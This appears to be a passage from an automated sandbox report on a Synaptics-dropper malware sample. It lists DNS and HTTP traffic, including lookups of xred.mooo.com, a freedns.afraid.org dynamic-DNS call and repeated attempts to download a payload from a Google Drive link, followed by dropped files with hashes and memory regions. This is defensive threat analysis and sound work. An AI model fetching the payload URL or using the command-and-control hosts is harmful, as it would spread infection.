    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=J7i5n7HM2s8Q07qOtwCoMb2hcFceZckYBb4gF9M2jEm4sd5BCdxs92T50otl8_23_ccmSmHt0SPPQX1EWbi-kYUxuyZXbYNTW3t4iJhmHSlHkR1z7KX_lr-oDl775RwJj5ZFcWy91d8zF0xlPaBOEgzCLlhz2hnpEMBzCpAgRZDG150
    Response
    HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC7ltMT89LK2JNSF5SisGsA9l4bO6hDsQvt5h15r1UcvMlTXpk-rkflo5V1kPdjAYbXVau52vE0
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 01 Jan 2025 16:33:54 GMT
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-3bLA6ZvTtRTWhMvu32CaEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
  • flag-us
    DNS
    67.179.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.179.250.142.in-addr.arpa
    IN PTR
    Response
    67.179.250.142.in-addr.arpa
    IN PTR
    par21s19-in-f31e100net
  • flag-us
    DNS
    174.214.58.216.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    174.214.58.216.in-addr.arpa
    IN PTR
    Response
    174.214.58.216.in-addr.arpa
    IN PTR
    mad01s26-in-f141e100net
    174.214.58.216.in-addr.arpa
    IN PTR
    par10s42-in-f14�I
    174.214.58.216.in-addr.arpa
    IN PTR
    mad01s26-in-f174�I
  • flag-us
    DNS
    225.74.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    225.74.250.142.in-addr.arpa
    IN PTR
    Response
    225.74.250.142.in-addr.arpa
    IN PTR
    par10s40-in-f11e100net
  • flag-us
    DNS
    30.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    30.243.111.52.in-addr.arpa
    IN PTR
    Response
  • 69.42.215.252:80
    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
    http
    Synaptics.exe
    430 B
    415 B
    6
    4

    HTTP Request

    GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    HTTP Response

    200
  • 216.58.214.174:443
    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    tls, http
    Synaptics.exe
    2.7kB
    11.3kB
    18
    14

    HTTP Request

    GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    303

    HTTP Request

    GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    303

    HTTP Request

    GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    303
  • 142.250.179.67:80
    http://c.pki.goog/r/r1.crl
    http
    Synaptics.exe
    303 B
    1.7kB
    4
    4

    HTTP Request

    GET http://c.pki.goog/r/r1.crl

    HTTP Response

    200
  • 142.250.179.67:80
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC
    http
    Synaptics.exe
    736 B
    1.6kB
    6
    4

    HTTP Request

    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf

    HTTP Response

    200

    HTTP Request

    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC

    HTTP Response

    200
  • 142.250.74.225:443
    https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    tls, http
    Synaptics.exe
    2.6kB
    14.7kB
    24
    21

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    404

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    404

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    404
  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    88.210.23.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    88.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    133.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    133.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    240.76.109.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    240.76.109.52.in-addr.arpa

  • 8.8.8.8:53
    xred.mooo.com
    dns
    Synaptics.exe
    59 B
    118 B
    1
    1

    DNS Request

    xred.mooo.com

  • 8.8.8.8:53
    freedns.afraid.org
    dns
    Synaptics.exe
    64 B
    80 B
    1
    1

    DNS Request

    freedns.afraid.org

    DNS Response

    69.42.215.252

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 224.0.0.251:5353
    57 B
    1
  • 8.8.8.8:53
    252.215.42.69.in-addr.arpa
    dns
    144 B
    144 B
    2
    2

    DNS Request

    252.215.42.69.in-addr.arpa

    DNS Request

    252.215.42.69.in-addr.arpa

  • 8.8.8.8:53
    49.192.11.51.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    49.192.11.51.in-addr.arpa

  • 8.8.8.8:53
    197.87.175.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    197.87.175.4.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    92.12.20.2.in-addr.arpa
    dns
    69 B
    131 B
    1
    1

    DNS Request

    92.12.20.2.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    docs.google.com
    dns
    Synaptics.exe
    61 B
    77 B
    1
    1

    DNS Request

    docs.google.com

    DNS Response

    216.58.214.174

  • 8.8.8.8:53
    c.pki.goog
    dns
    Synaptics.exe
    56 B
    107 B
    1
    1

    DNS Request

    c.pki.goog

    DNS Response

    142.250.179.67

  • 8.8.8.8:53
    o.pki.goog
    dns
    Synaptics.exe
    56 B
    107 B
    1
    1

    DNS Request

    o.pki.goog

    DNS Response

    142.250.179.67

  • 8.8.8.8:53
    drive.usercontent.google.com
    dns
    Synaptics.exe
    74 B
    90 B
    1
    1

    DNS Request

    drive.usercontent.google.com

    DNS Response

    142.250.74.225

  • 8.8.8.8:53
    67.179.250.142.in-addr.arpa
    dns
    73 B
    111 B
    1
    1

    DNS Request

    67.179.250.142.in-addr.arpa

  • 8.8.8.8:53
    174.214.58.216.in-addr.arpa
    dns
    73 B
    173 B
    1
    1

    DNS Request

    174.214.58.216.in-addr.arpa

  • 8.8.8.8:53
    225.74.250.142.in-addr.arpa
    dns
    73 B
    111 B
    1
    1

    DNS Request

    225.74.250.142.in-addr.arpa

  • 8.8.8.8:53
    30.243.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    30.243.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Synaptics\Synaptics.exe

    Filesize

    793KB

    MD5

    1951df1cc3262a172ce0bd85cc390d00

    SHA1

    e88411f0b9155eec15712630de1a45b654f52eb3

    SHA256

    98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56

    SHA512

    e06061133c6e987fc53fc1cfb3ddf5394a8d13d8635221bb98dc177f4c794ac3cb3adcbed810d47f6e212cd6082b44021ae9dbe0c113a1bff31a7cda9347aad1

  • C:\Users\Admin\AppData\Local\Temp\._cache_98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56N.exe

    Filesize

    40KB

    MD5

    83db3f55c5a97402b73de7fb23b77add

    SHA1

    7812537505190566cfc04c4708404e25c0750b4d

    SHA256

    af7120cdf209e98bfe63bbc98c176b57987976ab671ab25c5f71d3e72a13a168

    SHA512

    eee63a61b3e86ed029c2ab29bf477e3cc56c956321b29c7a36e947a9441c28bd46ebe629e3955b2339d494cc9cc905581e52af838d088c15b48fdcc557caa916

  • C:\Users\Admin\AppData\Local\Temp\3mdDEsCD.xlsm

    Filesize

    17KB

    MD5

    e566fc53051035e1e6fd0ed1823de0f9

    SHA1

    00bc96c48b98676ecd67e81a6f1d7754e4156044

    SHA256

    8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

    SHA512

    a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

  • C:\Users\Admin\AppData\Local\Temp\A0C75E00

    Filesize

    22KB

    MD5

    8f29bfad5cda71d6ace828951ed0a43d

    SHA1

    7e8578a126a38a236cacd939f7ee2c6336f364a7

    SHA256

    e2849a9d1255ba6abc7a5b2f02288b545ead79caf1b1df3c973e83019bc3a099

    SHA512

    c399abd5096f4b953d46e9bd2c0de603c127d104b36c723d10b15f45c0a047c9a5427d0699fe5bf171f3a4a174d1191bb931509dfb3c0f4109a57974153cdef6

  • memory/672-131-0x0000000002030000-0x0000000002031000-memory.dmp

    Filesize

    4KB

  • memory/672-194-0x0000000000400000-0x00000000004CC000-memory.dmp

    Filesize

    816KB

  • memory/672-195-0x0000000002030000-0x0000000002031000-memory.dmp

    Filesize

    4KB

  • memory/672-280-0x0000000000400000-0x00000000004CC000-memory.dmp

    Filesize

    816KB

  • memory/672-249-0x0000000000400000-0x00000000004CC000-memory.dmp

    Filesize

    816KB

  • memory/920-129-0x0000000000400000-0x00000000004CC000-memory.dmp

    Filesize

    816KB

  • memory/920-0-0x00000000007D0000-0x00000000007D1000-memory.dmp

    Filesize

    4KB

  • memory/2132-197-0x00007FF97E690000-0x00007FF97E6A0000-memory.dmp

    Filesize

    64KB

  • memory/2132-201-0x00007FF97C170000-0x00007FF97C180000-memory.dmp

    Filesize

    64KB

  • memory/2132-202-0x00007FF97C170000-0x00007FF97C180000-memory.dmp

    Filesize

    64KB

  • memory/2132-200-0x00007FF97E690000-0x00007FF97E6A0000-memory.dmp

    Filesize

    64KB

  • memory/2132-198-0x00007FF97E690000-0x00007FF97E6A0000-memory.dmp

    Filesize

    64KB

  • memory/2132-199-0x00007FF97E690000-0x00007FF97E6A0000-memory.dmp

    Filesize

    64KB

  • memory/2132-196-0x00007FF97E690000-0x00007FF97E6A0000-memory.dmp

    Filesize

    64KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.